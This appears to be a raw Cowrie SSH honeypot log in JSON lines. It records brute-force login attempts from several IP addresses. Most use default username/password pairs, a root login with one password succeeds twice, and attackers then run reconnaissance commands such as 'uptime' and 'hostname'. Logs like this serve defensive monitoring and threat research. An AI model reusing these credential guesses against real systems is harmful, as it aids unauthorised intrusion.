{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:28.273025Z","src_ip":"212.227.125.160","session":"6998abbec860"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:28.668148Z","src_ip":"212.227.125.160","session":"6998abbec860"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:29.758726Z","src_ip":"212.227.125.160","session":"6998abbec860"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456","message":"login attempt [debian/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:29.800557Z","src_ip":"212.227.235.229","session":"70285570554e"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:31.724704Z","src_ip":"212.227.235.229","session":"70285570554e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50372,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1327bc2027","protocol":"ssh","message":"New connection: 212.227.125.160:50372 (1.2.3.4:22) [session: 2d1327bc2027]","sensor":"my-vps","timestamp":"2025-08-31T00:55:33.483960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:34.325742Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:34.326530Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.59","src_port":36388,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fbfbdf218f1","protocol":"ssh","message":"New connection: 45.78.196.59:36388 (1.2.3.4:22) [session: 9fbfbdf218f1]","sensor":"my-vps","timestamp":"2025-08-31T00:55:35.713895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:35.714838Z","src_ip":"45.78.196.59","session":"9fbfbdf218f1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:55:35.902838Z","src_ip":"45.78.196.59","session":"9fbfbdf218f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41588,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0cb4d4a00d","protocol":"ssh","message":"New connection: 212.227.125.160:41588 (1.2.3.4:22) [session: 0e0cb4d4a00d]","sensor":"my-vps","timestamp":"2025-08-31T00:55:38.541926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:38.542707Z","src_ip":"212.227.125.160","session":"0e0cb4d4a00d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:38.618017Z","src_ip":"212.227.125.160","session":"0e0cb4d4a00d"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:38.891574Z","src_ip":"212.227.125.160","session":"0e0cb4d4a00d"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha@2018Amagneticos","message":"login attempt [root/Alpha@2018Amagneticos] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:55:39.750266Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33786,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c840c0ba26c","protocol":"ssh","message":"New connection: 212.227.235.229:33786 (1.2.3.4:22) [session: 1c840c0ba26c]","sensor":"my-vps","timestamp":"2025-08-31T00:55:39.993081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:55:39.994254Z","src_ip":"212.227.235.229","session":"1c840c0ba26c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:40.052459Z","src_ip":"212.227.125.160","session":"0e0cb4d4a00d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:55:40.060417Z","src_ip":"212.227.235.229","session":"1c840c0ba26c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"zcadqe","message":"login attempt [postgres/zcadqe] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:40.365495Z","src_ip":"212.227.235.229","session":"1c840c0ba26c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:41.433266Z","src_ip":"212.227.235.229","session":"1c840c0ba26c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:55:43.057536Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T00:55:43.058272Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:43.714550Z","src_ip":"45.78.196.59","session":"9fbfbdf218f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:44.254869Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:44.255920Z","src_ip":"212.227.125.160","session":"2d1327bc2027"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55186,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a5c78be333","protocol":"ssh","message":"New connection: 212.227.125.160:55186 (1.2.3.4:22) [session: f0a5c78be333]","sensor":"my-vps","timestamp":"2025-08-31T00:55:45.809870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:46.297128Z","src_ip":"212.227.125.160","session":"f0a5c78be333"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:55:46.297878Z","src_ip":"212.227.125.160","session":"f0a5c78be333"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37444,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9b503d6a693","protocol":"ssh","message":"New connection: 212.227.235.229:37444 (1.2.3.4:22) [session: c9b503d6a693]","sensor":"my-vps","timestamp":"2025-08-31T00:55:46.371033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:55:46.376924Z","src_ip":"212.227.235.229","session":"c9b503d6a693"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:55:46.610821Z","src_ip":"212.227.235.229","session":"c9b503d6a693"}
{"eventid":"cowrie.login.failed","username":"fumeiling","password":"123","message":"login attempt [fumeiling/123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:47.560717Z","src_ip":"212.227.235.229","session":"c9b503d6a693"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33226,"dst_ip":"1.2.3.4","dst_port":22,"session":"c793a6c9d258","protocol":"ssh","message":"New connection: 201.148.180.50:33226 (1.2.3.4:22) [session: c793a6c9d258]","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.159619Z"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.820111Z","src_ip":"212.227.235.229","session":"c9b503d6a693"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39298,"dst_ip":"1.2.3.4","dst_port":22,"session":"4595271de045","protocol":"ssh","message":"New connection: 212.227.125.160:39298 (1.2.3.4:22) [session: 4595271de045]","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.890241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.890974Z","src_ip":"212.227.125.160","session":"4595271de045"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456","message":"login attempt [debian/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.930943Z","src_ip":"212.227.125.160","session":"f0a5c78be333"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:48.965037Z","src_ip":"212.227.125.160","session":"4595271de045"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:49.141400Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:49.142829Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:49.202114Z","src_ip":"212.227.125.160","session":"4595271de045"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:50.345142Z","src_ip":"212.227.125.160","session":"4595271de045"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:50.414857Z","src_ip":"212.227.125.160","session":"f0a5c78be333"}
{"eventid":"cowrie.login.success","username":"root","password":"Alpha@2018Amagneticos","message":"login attempt [root/Alpha@2018Amagneticos] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:55:54.615858Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:55:57.500832Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T00:55:57.501824Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:58.686874Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:58.688488Z","src_ip":"201.148.180.50","session":"c793a6c9d258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42068,"dst_ip":"1.2.3.4","dst_port":22,"session":"c31b93643fc1","protocol":"ssh","message":"New connection: 212.227.125.160:42068 (1.2.3.4:22) [session: c31b93643fc1]","sensor":"my-vps","timestamp":"2025-08-31T00:55:58.928514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:58.980929Z","src_ip":"212.227.125.160","session":"c31b93643fc1"}
